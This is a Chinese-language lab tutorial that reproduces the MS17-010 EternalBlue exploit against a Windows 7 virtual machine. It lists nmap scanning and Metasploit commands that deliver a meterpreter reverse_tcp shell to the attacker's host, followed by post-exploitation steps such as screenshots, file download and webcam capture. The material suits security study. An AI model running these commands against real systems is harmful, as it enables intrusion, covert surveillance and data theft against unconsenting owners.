ms17_010(永恆之藍)漏洞復現詳細教程


如題,這是個漏洞復現的詳細教程,本教程針對的系統是Windows7操作系統,其他系統請自行測試。

備注:教程會很詳細,講解會很明白,一文可以解決你的常見困難。

測試環境

kalilinux 192.168.1.109 (主機)
windows7 192.168.1.104 (虛擬機)

開始

首先使用 nmap 命令掃描局域網內的所有主機(因為ms17_010漏洞的最基本要求是需要開啟445端口),這里使用nmap的最基本的掃描,直接命令后跟ip,nmap 192.168.1.1/24(掃描整個局域網的意思)。
首先開啟Metasploit框架,這是一款集合各種漏洞和后期利用工具的框架,強大到不需要太多專業知識就可以快速上手的攻擊框架,配合圖形化界面Armitage可以實現圖形化界面攻擊。

msfconsole //啟動命令

然后開啟另一個窗口,看一下自己的ip,掃描自己的所在的ip段,可以看到我的ip是192.168.1.109。,那么我的ip段就是192.168.1.1/24(掃描1-255主機)。

ifconfig 查看自己電腦ip

使用nmap掃描局域網所有主機的開放端口

nmap 192.168.1.1/24 //掃描主機的端口開放情況

這里顯示了目標電腦的ip和端口服務等信息,可以看到這個電腦的445端口是開放的,所以就直接進行攻擊。

回到剛才的窗口,搜索ms17_010漏洞,可以看到返回了四條數據,我們這里使用的是第三條進行攻擊,可以先使用第二條測試下目標電腦是否包含該漏洞,若是有的話進行攻擊,沒有的話可以考慮別的目標。

search ms17_010

使用永恆之藍漏洞,使用use 名稱 命令進行命令使用。

use exploit/windows/smb/ms17_010_eternalblue //使用永恆之藍漏洞

然后顯示所需要的參數.

show options

我們需要設置一個遠程主機ip和一個自己電腦ip,外加一個攻擊載體,就可以進行攻擊了(依次執行下邊命令)。

set rhost 192.168.1.104 //設置目標主機

set payload windows/x64/meterpreter/reverse_tcp //設置攻擊載體(簡單來說就是,如果不使用這個模塊,攻擊成功之后,就是一個簡單的shell,使用這個載體,攻擊成功之后可以使用這個模塊自帶的各種攻擊模塊(強大到想流淚的功能模塊))。

set lhost 192.168.1.109 //設置本機ip地址(用來攻擊成功之后,監聽被開放的目標電腦的端口)

run //執行攻擊

設置完成之后可以查看下設置的參數,以確保參數正確(這個步驟可以省略)。

show options

run //執行漏洞

利用成功,成功之后會出現下面的情況,在這里可以進行文件上傳下載,獲取截屏,獲取密碼,使用攝像頭拍照,后門持久化等操作。

截屏操作,截取的圖片可以去制定的目錄里面查看

screenshot

獲取截屏。

下載文件

download AHK.ahk

使用攝像頭拍照

webcam_snap //使用攝像頭拍一張照片

webcam_stream //在網頁開啟攝像頭


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM